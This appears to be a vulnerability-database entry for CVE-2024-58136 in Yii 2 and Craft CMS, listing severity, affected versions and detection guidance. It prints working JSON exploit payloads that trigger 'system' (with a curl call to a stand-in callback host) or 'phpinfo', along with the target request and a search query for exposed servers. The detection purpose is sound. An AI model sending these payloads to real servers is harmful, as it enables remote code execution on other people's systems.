cbcvebase.
CVE-2024-58136
published 2025-04-10

CVE-2024-58136: Yii 2 before 2.0.52 mishandles the attaching of behavior that is defined by an __class array key, a CVE-2024-4990 regression, as exploited in the wild in…

PriorityP190critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2025-05-23
Exploited in the wild
EPSS
87.71%
99.7th percentile
Yii 2 before 2.0.52 mishandles the attaching of behavior that is defined by an __class array key, a CVE-2024-4990 regression, as exploited in the wild in February through April 2025.

Affected

4 ranges
VendorProductVersion rangeFixed in
craftcmscms>= 4.0.0-RC1 < 4.16.174.16.17
craftcmscms>= 5.0.0-RC1 < 5.8.215.8.21
yiiframeworkyii< 2.0.522.0.52
yiisoftyii2>= 0 < 2.0.522.0.52

Detection & IOCsextracted from sources · hover to see the quote

command{"as hack": {"__class": "GuzzleHttp\\Psr7\\FnStream", "class": "yii\\behaviors\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream":"curl {{interactsh-url}}"}}
command{"as hack": {"__class": "GuzzleHttp\\Psr7\\FnStream", "class": "yii\\behaviors\\AttributeBehavior", "__construct()": [[]], "_fn_close": "phpinfo"}}
urlPOST /index.php HTTP/1.1 (with Content-Type: application/json and malicious __class JSON payload)
  • Detect HTTP POST requests to /index.php with Content-Type: application/json containing the '__class' key in the JSON body, specifically referencing 'GuzzleHttp\Psr7\FnStream' and Yii behavior classes — this is the exploit payload pattern for CVE-2024-58136.
  • Flag JSON bodies containing the key '__class' with value 'GuzzleHttp\Psr7\FnStream' combined with '_fn_close' set to 'system' or 'phpinfo' — these are the known exploit gadget chains.
  • The exploit chain requires CVE-2025-32432 to first write PHP code into a session file; then CVE-2024-58136 is triggered via a malicious JSON payload to execute that session file. Detect the combination of unusual session file creation followed by a JSON POST with '__class' key.
  • Post-exploitation indicator: look for newly uploaded PHP file manager files on the server following successful exploitation of this chain.
  • Use the Nuclei template flow: first confirm 'Yii' in the HTTP response body (GET /), then send the malicious JSON POST to /index.php. An HTTP callback to an interactsh URL or 'PHP Version'/'PHP Extension' in the response body confirms exploitation.
  • FOFA/Shodan exposure query: search for title='Yii' to identify potentially vulnerable internet-facing Yii2 instances for proactive patching or monitoring.
  • ·Craft CMS ships with Yii 2.0.51 (vulnerable) by default even after the CVE-2025-32432 patch; however, the full exploit chain is broken by the Craft CMS fix alone — the Yii vulnerability is not independently triggerable in patched Craft CMS deployments.
  • ·CVE-2024-58136 is a regression of CVE-2024-4990; environments that previously patched CVE-2024-4990 but have not upgraded to Yii 2.0.52 remain vulnerable.
  • ·This vulnerability affects any product implementing the Yii framework, not just Craft CMS — detection and patching scope should extend to all Yii-based applications.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ghsa9.1CRITICAL
osv9.1CRITICAL
vulncheck9.0CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.